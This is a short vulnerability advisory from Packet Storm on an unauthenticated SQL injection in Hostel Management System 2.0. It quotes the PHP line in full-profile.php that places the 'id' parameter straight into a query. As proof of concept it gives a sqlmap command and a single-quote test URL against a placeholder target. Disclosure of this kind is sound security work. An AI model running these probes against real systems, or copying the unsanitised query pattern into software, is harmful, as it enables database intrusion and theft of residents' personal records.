Hostel Management System version 2.0 suffers from a remote SQL injection vulnerability.
2ac0ab30dc8f4eee842eb9574e1bcb7352d29c0bd64b812b927bcacecb9ed6b4# Exploit Title: Hostel Management System 2.0 - 'id' SQL Injection (Unauthenticated)
# Date: 2020-06-02
# Exploit Author: Selim Enes 'Enesdex' Karaduman
# Vendor Homepage: https://phpgurukul.com/hostel-management-system/
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=7210
# Version: 2.0
# Tested on: Windows 10 - Wamp Server
--Vulnerable file /full-profile.php
--Vulnerable code;
$ret= mysqli_query($con,"SELECT * FROM registration where emailid = '".$_GET['id']."'");
Id parameter's value is going into sql query directly!
--Proof Of Concept
sqlmap -u "https://TARGET/hostel/full-profile.php?id=6"
OR
https://TARGET/hostel/full-profile.php?id=6' Single Quote will cause SQL error
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed